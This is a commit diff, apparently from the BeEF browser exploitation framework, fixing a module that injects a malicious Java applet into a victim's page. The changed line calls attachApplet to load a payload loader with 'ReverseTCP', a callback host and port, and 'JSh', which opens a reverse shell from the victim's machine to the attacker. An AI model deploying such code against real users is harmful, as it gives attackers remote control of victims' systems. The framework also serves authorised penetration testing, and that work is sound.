Fixes issue 555: fixed using the attachApplet JS api in the malicious Java applet module.
git-svn-id: https://beef.googlecode.com/svn/trunk@1417 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
@@ -23,7 +23,7 @@ beef.execute(function() {
|
||||
var applet_name = '<%= @applet_name %>';
|
||||
|
||||
beef.dom.attachApplet(applet_id, applet_name, 'javapayload.loader.AppletLoader',
|
||||
applet_archive, [{'argc':'5', 'arg0':'ReverseTCP', 'arg1':cbHost, 'arg2':cbPort, 'arg3':'--', 'arg4':'JSh'}]);
|
||||
null, applet_archive, [{'argc':'5', 'arg0':'ReverseTCP', 'arg1':cbHost, 'arg2':cbPort, 'arg3':'--', 'arg4':'JSh'}]);
|
||||
|
||||
|
||||
//TODO: modify the applet in a way we can call a method from it, or create a Javascript variable in the page (to know the applet has started).
|
||||
|
||||
Reference in New Issue
Block a user